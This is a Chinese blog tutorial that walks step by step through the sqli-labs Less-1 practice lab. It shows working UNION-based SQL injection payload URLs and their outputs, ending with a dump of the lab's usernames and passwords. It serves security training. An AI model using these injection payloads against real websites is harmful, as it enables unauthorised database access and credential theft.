sql-labs-less1 基于显错的union注入全过程

最新推荐文章于 2023-07-16 14:29:51 发布
最新推荐文章于 2023-07-16 14:29:51 发布
阅读量629 收藏 1
点赞数 1
分类专栏: sql注入 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mysmycbx/article/details/118446514
版权

sql-labs-less1 GET - Error based - Single quotes - String

step0 准备

http://localhost/sqli-labs/Less-1/

HackBar

MySQL

Apache

step1 测试

首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;

payload:	
http://localhost/sqli-labs/Less-1/?id=1 --+

mysql:		
SELECT * FROM users WHERE id='1' LIMIT 0,1

result:		
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' --+

result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

payload:
http://localhost/sqli-labs/Less-1/?id=1‘ and 1=1 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+

result:
none!

结论:所以该网站可能存在sql注入漏洞,接下里用order by 1-99语句查询该数据表的字段数量。

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 2 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+

result:
Unknown column '4' in 'order clause'

结论:所以字段数为3。

payload:
http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3--+

result:
Your Login name:Dumb
Your Password:Dumb

这里成功执行,但没有返回union select的结果,这是由于代码只返回第一条结果,所以union select获取的结果没有输出到页面。于是设置id=-1,这样可以显示后者的结果。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3--+

result:
Your Login name:2
Your Password:3

返回的结果为2,3,意味着union select 1,2,3中,2和3的位置可以输入MySQL语句,于是我们尝试在3的位置查询当前数据库名(database()函数)

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,database()--+

result:
Your Login name:2
Your Password:security

数据库名:security

step2 注入

接下来,来说获取表名

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 0,1) --+

result:
Your Login name:2
Your Password:emails

这里可以修改limit 0,1。改为group_concat函数可以获得所有表名。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

result:
Your Login name:2
Your Password:emails,referers,uagents,users

这里以users为例,下一步是获取字段名。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) --+

result:
Your Login name:2
Your Password:id

这里可以修改limit 0,1。改为group_concat函数可以获得所有字段名。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ) --+

result:
Your Login name:2
Your Password:id,username,password

最后爆出用户名和密码

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(concat(username,':',password)) from security.users ) --+

result:
Your Login name:2
Your Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4

step3 结论

结论如下:

Dumb Dumb
Angelina I-kill-you
Dummy p@ssword
secure crappy
stupid stupidity
superman genious
batman mob!le
admin admin
admin1 admin1
admin2 admin2
admin3 admin3
dhakkan dumbo
admin4 admin4

TryHardToKeep
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入sqli-labs系列教程(less1-10)详解
wangqaz50的博客
02-03 353
<div id="article_content" class="article_content clearfix"> <link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="mar...
sqli-labs/Less-1注入
weixin_50339082的博客
06-20 74
sqli-labs/Less-1注入 Sali-lsbs第一关 1、先判断是字符型还是数字型。 127.0.0.1/sqli-labs/Less-1/?id=1 127.0.0.1/sqli-labs/Less-1/?id=1 and 1=2 说明是字符型。 2、确认字段位数 127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+ 127.0.0.1/sqli-labs/Less-1/?id=3’ order by 4--+ 一共3位。 3、判断信息输
sql注入系列Sqli-labs(less-1)
BetsyMyGirl的博客
11-30 2219
判断注入点 http://192.168.81.210/sqli/Less-1/?id=1’输入单引号出现报错,从报错语句中可以猜测后端代码为 select user from users where id='1' limit 0,1 当输入了一个单引号语句就变成了 select user from users where id='1'' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语
sqli-labs/less-1:基于错误提示的sql注入
paintShadow的博客
07-31 983
根据大佬的文章做的sql注入 打开less-1得到以上界面,页面提示:输入数字范围内的id 首先构造URL,?id=1会得到以下界面 然后依次向下试验,发现到id=13时没有出现任何信息 当输入id=1’ order by 1,‘1时,页面与输入id=1一样,但是并未出现语法错误,原因是sql语句会变成id=‘1’ order by 1,‘1’。所以依次试下去会发现order by 2和3都是能显...
Sqli-labs Less-1 报错注入
04-14 389
Sqli-labs Less-1 报错注入 1、首先打开less1后是一个页面,提示输入id作为参数。输入id=1试一下。 然后会出现,name 和 password,添加一个单引号 ' 测试一下注入点。 输入单引号发现,会直接将报错结果显示在页面中这里就可以尝试报错注入,将用户、数据库名称都爆破出来。 这里我们使用updatexml函数获取user()值。下图可以看到报错注入确实有效,我们看到用户为root,接下来爆数据库的名字。 0x7e是 '~' 的ASCII编码。 /sq.
SQL-labs/less1通关教程
最新发布
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sql-labs通关技巧
03-01
在实际操作中,可能会遇到更复杂的注入点,比如`less1`的爆破数据库示例,我们可以使用类似的SQL语句结合`UNION SELECT`来尝试获取信息,同时`sqlmap`也可以用相同的方法辅助攻击。 总结来说,SQL注入的关键在于...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 938
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
less 函数_sqli-labs注入超详细版(less-1)
weixin_39710251的博客
11-26 154
sql注入是一个很重要安全漏洞,之前学的总是摸棱两可,后来再渗透过程中,经常遇到需要手工注入的情况,这次就从头到尾再做一次,结合mysql数据库一起讲解,希望能给大家带来帮助,顺便自己再一次学习。less-1 是字符注入,提示我们提交一个id试试在url中加入?id=1 正常显示出id为1的账号信息。此时数据库查询语句大概是这样id是字符型(这是我本地新建的模拟数据,不是sqli-la...
SQL注入Sqli-labs-Less1-4 》
weixin_47118413的博客
04-17 2757
讲解分析sqli-labs第1—4关解题思路和流程。首先判断这四关是什么交互方式(GET/POST),在判断是什么类型的注入,之后找到闭合方式,在进行数据库爆破。
SQL注入sqli-labs的Less1~10史上最详细通关教程
qq_49502930的博客
11-14 4647
SQL注入sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
less-1 字符型注入
weixin_52348955的博客
10-30 3172
url编码:空格为20%,'为27%,#为23% 字符型注入的原理和判断方法在最下面的附录里: 第一步: ?id=999999999' union select 1,2,database()# id设置为很大的原因:如果设置id为1,那么mysql确实查出了两条结果(即id=1查询到的结果和database查询到的结果),但是PHP代码决定了该页面只显示一行记录,所有让id等于一个很大的值或者-1,使得id查询不到结果,就只会显示第二条查询语句的结果 database()前面加了1,2,的原因请看附录 h
sql----联合注入攻击
MD_YAN的博客
07-24 198
1.sqli-less1进行联合注入攻击爆数据 判断注入点: 注入漏洞类型判断: 判断数据库表的字段数 order by 1-99 来判断字段数:?id’ order by 4 --+ 判断输出的位置: 爆库名: 爆表名: http://localhost/sqli/Less-1/?id=0’ union select 1,2, (select group_concat(table_name) from information_schema.tables where table_schem
Sqli-Labs学习sql注入Sqli-Labs less-1&2
vegetable_haker的博客
10-25 829
Sqli-Labs:Less-1 尝试传入参数 localhost/sqlilabs/Less-1/?id=1 localhost/sqlilabs/Less-1/?id=1' localhost/sqlilabs/Less-1/?id=1'' localhost/sqlilabs/Less-1/?id=1''' 在测试以上传参的时候发现第一和第三条的时候页面能正...
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
网络安全之sql注入-less1
koala_king的博客
08-17 1363
less-1 是字符注入union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
sqli-labs实验指导手册
11-17
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值